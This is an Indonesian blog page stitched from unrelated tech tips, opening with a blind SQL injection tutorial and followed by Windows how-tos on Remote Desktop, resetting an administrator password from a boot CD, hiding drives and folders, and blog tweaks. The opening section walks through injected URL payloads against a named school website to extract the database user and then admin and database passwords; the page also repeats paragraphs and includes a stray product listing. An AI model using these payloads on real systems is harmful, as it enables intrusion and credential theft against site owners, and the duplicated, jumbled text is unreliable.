<!-- SQL INJECTION ++ --!>
Apa sich Blind SQL Injection tu? Blind SQL Injection adalah salah satu tehnik exploitasi database yang berbeda dengan sql injection biasa dimana pada sql injection biasa akan mengeluarkan sebuah value akan tetapi pada tehnik blind sql injection tidak akan mengeluarkan value apapun akan tetapi kita akan mengetahui value tersebut dengan trial and error akan value tersebut / menguji true atau falsenya value tersebut... disini GT memakai command mid()= hampir sama fungsinya dengan substring() char()= adalah peubah dari karakter lanjut.. ingat..sebelum mencoba,kita cek version sql nya..cara cek ada d tutorial sql inject yg satu lg.. kalau version 4..kita memakai blind,karena v4 tidak support query information_schema kalau version 5,boleh pake ini,boleh pake sql inject yg biasa..wkwkwkw lanjut... Target: www.smanti.com (thx to bejamz udah ngasih target :) 1.PENGETESAN BUG Seperti biasa..ikuti langkah sebelumnya,seperti di tutorial SQL Inject biasa..cari halaman yng dinamis,sisipkan and 1=0 dan and 1=1 www.smanti.com/berita.php?id=5 and 1=0 <<www.smanti.com/berita.php?id=5 and 1=1 <<eh ternyata ada bug nya.. lanjut.... 2.BLIND INJECT Query yg dipakai: and mid(user(),1,1)=CHAR(65) saya jelaskan sedikit deh.. mid(user()1,1) = dalam kasus ini kita tidak tahu value dari user itu apa maka dalam "()" kita kosongkan dan angka 1,1 dibelakang () adalah urutan dari value tersebut sedangkan CHAR adalah peubah dalam decimal dan (65) adalah value decimal tersebut. kenapa kita mulai dengan 65 ? karena "65" adalah "A" dalam ascii... lanjut.. mari kita masukkan www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(65) ternyata hasilnya masih false (beritanya hilang) berarti value yg kita masukkan salah.. tinggal tambah value na..jadi.. www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(66) <www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(67) <www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(68) <www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(69) <juga.. dst sampe kita menemukan keadaan true(beritanya muncul kembali) kebetulan ada di char(83) www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(83) <true.. cape?masih kuat?hahaha..trial n error... lanjut.. kita tambain value na.. www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65) adakah perbedaan nya? yap,angka pada user kita naikkan menjadi 2 dan kita menambahkan value char kembali,dari 65.. gini nih.. 1,1 = value pertama user 1,2 = value kedua user 1,3 = value ketiga user dst dan 83 adalah nilai true,lalu kita tambahkan.. www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65) www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,66) www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,67) dst.. sampe dpet yg true.. ternyata yg true ngumpet di value 77 www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,77) lanjutin trus langkah2na.. cari value k 3 user.. www.smanti.com/berita.php?id=5 and mid(user(),1,3)=CHAR(83,77,65) eh langsung ktemu..hehehe.. lanjut value k 4.. www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,65) www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,66) www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,67) ternyata ktemu di value 78.. www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,78) lanjut trus aja... cape gw.. pokoknya..setelah dapet smua..kita convert char yang tadi di ke ascii table www.piclist.com/techref/ascii.htm stelah d convert,ternyata 83 77 65 78 tuh d ascii adalah SMAN. nah udah hampir tebak user name nya..kerjain ndiri y..okey. nah..gmana kalo mw dapet password na? kita rubah value user() menjadi database() dan ulangi tahap2 diatas hingga mendapat semua value yang true.. jadi www.smanti.com/berita.php?id=5 and mid(database(),1,1)=CHAR(65) cari lagi..sama kayak cari user tadi..harus sabar.. ulangi sampai dapat true .. tambain value na..wkwkwkw.. dan rubah value database() untuk mencari value lainnya.. hingga mendapat admin password dan db password metode blind sql injection seperti ini membutuhkan kesabaran dan ketelitian attacker untuk mendapatkan value yg tepat..(true) akan tetapi metode ini hingga sekarang cukup efektif untuk web yang telah menfilter celah sql injection...hehehe...
Kalau komputer sahabat sudah
terhubung dengan jaringan, baik secara wireless atau menggunakan kabel (
lihat artikel terdahulu Membuat
jaringan Komputer Sederhana, Membuat
Koneksi Wireless Antar Laptop ), selain sharing data, printer,
koneksi internet, kita juga dapat melakukan Remote Desktop.
Dengan Remote desktop kita bisa melihat tampilan layar komputer lain (yang diremote) sama seperti di komputer aslinya, dan kita dapat melakukan perintah sesuai dengan yang kita inginkan.
Misal komputer A dan komputer B. Kita ingin agar komputer A bisa dilakukan remote desktop oleh user dari komputer B. ( komputer A dikendalikan oleh user di komputer B).
Cara settingnya sebagai berikut
Karena tujuannya untuk meremote komputer A, jadi Kita hanya perlu setting di komputer A.
1 • Tentukan nama user ( harus berpassword), kalau belum silakan create/edit dulu ( control panel --> user account), yang akan digunakan untuk remote desktop user
2 • klik kanan pada my computer --> Properties - pilih tab Remote
Dengan Remote desktop kita bisa melihat tampilan layar komputer lain (yang diremote) sama seperti di komputer aslinya, dan kita dapat melakukan perintah sesuai dengan yang kita inginkan.
Misal komputer A dan komputer B. Kita ingin agar komputer A bisa dilakukan remote desktop oleh user dari komputer B. ( komputer A dikendalikan oleh user di komputer B).
Cara settingnya sebagai berikut
Karena tujuannya untuk meremote komputer A, jadi Kita hanya perlu setting di komputer A.
1 • Tentukan nama user ( harus berpassword), kalau belum silakan create/edit dulu ( control panel --> user account), yang akan digunakan untuk remote desktop user
2 • klik kanan pada my computer --> Properties - pilih tab Remote
3 • Beri contreng pada Allow user to connect remotely to this computer
4 • Klik Select Remote User --> klik add --> ketik nama user( sesuai step-1) --> klik check name--> klik OK--> OK
Di komputer yang akan dipakai untuk
meremote (Komputer B, C, dst) kita tinggal menjalankan Aplikasi Remote
Desktop Connection ( Start --> All Programs --> Accessories -->
Communications --> Remote Desktop Connection)
•
Masukkan Alamat IP komputer atau nama
komputer yang akan diremote --> klik Conect (tunggu beberapa
saat)
• Masukkan user name ( remote user )dan password ( username sesuai step-4 ).
Kini kita sudah bisa melihat, mengendalikan/ mengontrol komputer A dari komputer B.
• Masukkan user name ( remote user )dan password ( username sesuai step-4 ).
Kini kita sudah bisa melihat, mengendalikan/ mengontrol komputer A dari komputer B.
Semoga bermanfaat .
11111111111111111111111111111111111111111111111111111111111111111111111111111111
Kalau suatu saat sobat lupa
user password di windows (xp, vista),
itu tidak terlalu masalah, karena masih bisa direset menggunakan
account administrator , tetapi kalau yang lupa adalah password
administratornya, ini baru masalah karena sudah barang tentu tidak
bisa di-reset menggunakan account user.
Ada cara alternatif untuk mengatasi kalau sobat lupa password administrator, sebelum menggunakan jalan terakhir yaitu menginstal ulang windowsnya, caranya yaitu dengan me-reset password menggunakan tool berikut.
• Silakan download softwarenya, ukurannya sekitar 3,6 MB, (suport windows xp dan vista)
• Extract file zipnya, didalamnya ada file iso(cd080802.iso), kemudian copykan (burn) ke CDR blank menggunakan software burning seperti nero, roxio..dll. Gunakan pilihan Burn image to disc (nero).
• Booting komputer menggunakan CD yang telah kita buat (set komputer (bios)agar first bootnya ke CD/DVD drive).
Ada cara alternatif untuk mengatasi kalau sobat lupa password administrator, sebelum menggunakan jalan terakhir yaitu menginstal ulang windowsnya, caranya yaitu dengan me-reset password menggunakan tool berikut.
• Silakan download softwarenya, ukurannya sekitar 3,6 MB, (suport windows xp dan vista)
• Extract file zipnya, didalamnya ada file iso(cd080802.iso), kemudian copykan (burn) ke CDR blank menggunakan software burning seperti nero, roxio..dll. Gunakan pilihan Burn image to disc (nero).
• Booting komputer menggunakan CD yang telah kita buat (set komputer (bios)agar first bootnya ke CD/DVD drive).
Untuk Microsoft Windows
yang terinstall secara standard (yang umum), sampai step/urutan ke 7 kita
tinggal tekan enter .
• 1. Tampilan pertama
seperti ini
• 2. Tekan Enter,
tunggu loading beberapa saat
• 3. Pilih Partisi dimana
windows terinstall, atau langsung
Tekan Enter
• 4. Pilih windows
registry directory, atau langsung Tekan Enter
• 5. Tekan Enter ( Pilihan : Pasword
Reset)
• 6. Tekan Enter (User data and
Password)
• 7. Tekan Enter (pilihan : administrator
account)
• 8. Ketik 1 (angka satu ) kemudian tekan Enter ( memilih clear / blank password )
• 9. Ketik ! (tanda seru) kemudian tekan Enter (untuk keluar)
• 10. Ketik q kemudian tekan Enter (untuk keluar)
• 11. Ketik y kemudian tekan Enter untuk menyimpan.
• 12.
ketik n kemudian tekan enter untuk keluar
• Keluarkan CD, tekan
tombol Control + Alt + Del Untuk Reboot komputer
Account administrator saat ini sudah tidak memakai password ( blank
).
Semoga Bermanfaat ..
1111111111111111111111111111111111111111111111111111111111111111111111111111111
Secara default di windows, dokumen
yang telah kita buka atau edit akan tersimpan historinya di My Recent
Documents. Kalau anda ingin menghapus history tersebut secara otomatis
yaitu ketika anda log off atau ketika komputer dimatikan caranya sebagai
berikut :
1. Klik Start -->RUN
--> ketik regedit --> klik OK
2. Pada Registry Editor masuk ke : HKEY_Current_User\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
3. Di jendela sebelah kanan : klik kanan di area kosong-->klik new--> DWORD value, kemudian beri nama : ClearRecentDocsOnExit
2. Pada Registry Editor masuk ke : HKEY_Current_User\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
3. Di jendela sebelah kanan : klik kanan di area kosong-->klik new--> DWORD value, kemudian beri nama : ClearRecentDocsOnExit
4. Dobel klik DWORD ClearRecentDocsOnExit, pada value data ubah angka 0 menjadi 1
--> klik OK --> exit
Untuk menormalkan kembali, lakukan kembali langkah 1, 2, dan 4. Pada langkah 4 kembalikan value data dari 1 menjadi 0.
Semoga bermanfaat.
111111111111111111111111111111111111111111111111111111111111111111111111111
Membuat Aplikasi Supaya Tidak Berfungsi
Bagaimana kalau kita ingin agar sebuah aplikasi yang ada di
komputer tidak dapat dijalankan?, maksudnya agar orang lain, teman, atau siapa
saja, tidak bisa menjalankan aplikasi yang dimaksud..Ada sebuah software yang bisa menjawab pertanyaan ini, namanya Applocker dari Smart-x.com. Kita bisa mengatur aplikasi mana saja yang akan kita blok dan mana saja yang bisa dijalankan.
Silakan download dari websitenya Smart-x.com atau disini untuk file zipnya, ukurannya sekitar 1 MB.
Cara menggunakannya:
Setelah diinstalkan, jalankan program Applocker,
Beri check/contreng pada nama aplikasi yang akan di-nonaktifkan , kemudian klik Save --> Close.
Silakan coba jalankan aplikasi yang tadi dicontreng, maka akan ada peringatan seperti ini :
Untuk aplikasi yang tidak terdaftar pada list, kita bisa memasukan secara manual.
Klik Configure , pada kolom Caption isi dengan nama aplikasi (namanya bebas), pada kolom executable file name isi dengan nama file exe-nya --> Klik Add--> Klik OK.
Untuk menormalkan kembali, uncheck nama aplikasi yang akan dinormalkan..
Semoga bermanfaat.
11111111111111111111111111111111111111111111111111111111111111111111111111111111111
Menyembunyikan Drive Komputer
Karena alasan tertentu suatu saat kita mungkin harus menyembunyikan drive (C,D,E,..) yang ada di komputer kita.Berikut ini adalah dua alternatif yang bisa dilakukan untuk menyembunyikan atau menghilangkan drive dari tampilan windows kita tanpa melalui registry editor dan tanpa menggunakan software tambahan.
Cara pertama yaitu menggunakan perintah diskpart, dan cara kedua dengan menggunakan gpedit (group policy editor) , yang pasti keduanya sama-sama mudah dilakukan.
Cara Pertama yaitu dengan menggunakan perintah diskpart
1. Klik Start --> Run --> ketik cmd --> klik OK
2. ketik diskpart --> tekan enter
3. ketik list volume --> tekan enter (untuk melihat list drive yang ada di komputer)
Tentukan Drive yang akan disembunyikan, misalnya disini kita akan menyembunyikan drive D
4. ketik select volume 3 --> tekan Enter
5. ketik remove letter D --> tekan Enter
ketik exit untuk keluar dari diskpart.
(untuk melihat hasilnya cek di my computer, pada beberapa kasus komputer harus di-restart terlebih dahulu).
Untuk Mengembalikan atau menampilkan kembali drive yang disembunyikan, lakukan hal yang sama dari langkah 1 sampai 4
Pada langkah 5 perintahnya diubah menjadi :
ketik assign letter D
Cara kedua yaitu dengan menggunakan perintah gpedit (group policy editor)
1. Klik Start --> Run --> ketik gpedit.msc -->klik OK
2. Klik dua kali User Configuration --> Administrative Templates --> Windows Components --> Windows Explorer -->kemudian pilih Hide these specified drives in my computer di jendela sebelah kanan
Pada Jendela Hide specified drives in My Computer : pilih enable, kemudian tentukan drive yang akan disembunyikan (restrict)
Misalnya disini yang akan disembunyikan adalah drive D, maka pilih Restrict D drive only, kemudian klik Apply --> OK
Cek di My Computer untuk melihat hasilnya.
Untuk menampilkan kembali, lakukan urutan langkah yang sama, kemudian pada Jendela Hide specified drives in My Computer pilih opsi Not Configured --> klik Apply --> OK
Selamat mencoba semoga bermanfaat
.Download this article in PDF
11111111111111111111111111111111111111111111111111111111111111111111111
Membuat Blog Title Bergerak dari kanan
ke kiri
• Masuk ke Dashboard-->Layout(tata letak)-->Edit Html
• Back up Full template
• Tandai (centang) pada Expand template widget
• Cari kode berikut ini <title><data:blog.pagetitle/></title>
(gunakan menu edit-->find atau tekan control+f )
• Kalau sudah ketemu ganti kode tersebut dengan script berikut:
<b:include data='blog' name='all-head-content'/>
<script language='JavaScript'>
var txt="<data:blog.pageTitle/>";
var kecepatan=400;var segarkan=null;function bergerak() { document.title=txt;
txt=txt.substring(1,txt.length)+txt.charAt(0);
segarkan=setTimeout("bergerak()",kecepatan);}bergerak();
</script>
Untuk mempercepat gerakan ganti angka 400 dengan 300 atau 200.
• Masuk ke Dashboard-->Layout(tata letak)-->Edit Html
• Back up Full template
• Tandai (centang) pada Expand template widget
• Cari kode berikut ini <title><data:blog.pagetitle/></title>
(gunakan menu edit-->find atau tekan control+f )
• Kalau sudah ketemu ganti kode tersebut dengan script berikut:
<b:include data='blog' name='all-head-content'/>
<script language='JavaScript'>
var txt="<data:blog.pageTitle/>";
var kecepatan=400;var segarkan=null;function bergerak() { document.title=txt;
txt=txt.substring(1,txt.length)+txt.charAt(0);
segarkan=setTimeout("bergerak()",kecepatan);}bergerak();
</script>
Untuk mempercepat gerakan ganti angka 400 dengan 300 atau 200.
1111111111111111111111111111111111111111111111111111111111111
Kensington 33120 FlyLight USB 2.0 Notebook Light (PC/Mac)
Kensington 33120 FlyLight USB 2.0 Notebook Light (PC/Mac)How Cheap Can You Get? Journal (Notebook, Diary) (Pulp
Journals)Executive Notebook,Black,150 Pages,9-1/4x7-1/4Ada Banyak cara untuk memproteksi
atau mengamankan data di komputer, dengan mengenkripsi atau juga
dengan menyembunyikan file supaya tidak bisa dilihat oleh orang lain.
Untuk kali ini kita
sembunyikan folder dengan memakai My Lockbox , sehingga file - file tidak
dapat dilihat.
My Lockbox adalah freeware for
windows dari FSPRO labs http://www.fspro.net/ file installernya dapat
didownload langsung di websitenya atau disini.
Setelah didownload extract file
installernya dan installkan.
Proses instalasinya cukup mudah
tinggal next next saja, pada saat instalasi kita juga diminta memasukkan
password yang diinginkan dan password hint (untuk mengingatkan kita pada
password, kalau lupa)
Jalankan program. Untuk keamanan
setiap kali program dijalankan akan selalu meminta password. Ketika pertama
kali dijalankan kita harus menentukan lokasi folder yang akan dimanage (yang
akan disembunyikan). atau kita juga bisa membuat folder baru, bisa di C,
D di my document atau dimana saja terserah yang kita inginkan.
Pindahkan file-file yang ingin
disembunyikan ke my lock folder klik tombol lock untuk mengunci,
atau unlock untuk membuka.
Gunakan windows explorer untuk
melihat folder.
Dalam status lock ( keadaan
terkunci), folder tidak akan terlihat (view hide folder pada menu tools folder
options tidak berpengaruh, folder tetap tidak terlihat).
Semoga bermanfaat
Semoga bermanfaat
11111111111111111111111111111111111111111111111111111111111111111
Dalam suatu perjalanan yang tidak
tersedia jaringan listrik, tentu kita ingin membuat pemakaian baterai laptop
kita lebih irit agar lebih bisa bertahan lama.
Berikut adalah tip tip nya :
Setting layar lebih redup
Karena semakin cerah tampilan layar akan memakan lebih banyak mengkonsumsi listrik, tetapi tentu masih pada kondisi yang nyaman buat mata kita.
Berikut adalah tip tip nya :
Setting layar lebih redup
Karena semakin cerah tampilan layar akan memakan lebih banyak mengkonsumsi listrik, tetapi tentu masih pada kondisi yang nyaman buat mata kita.
Matikan wireles device kalau
tidak digunakan
Untuk yang ada tombol on dan off nya
tinggal di offkan saja. Untuk yang tidak ada, kita bisa mendisablekanmelalui
jendela control panel Divice Manager.
Setting power scheme lebih efektif
Tidak ada komentar:
Posting Komentar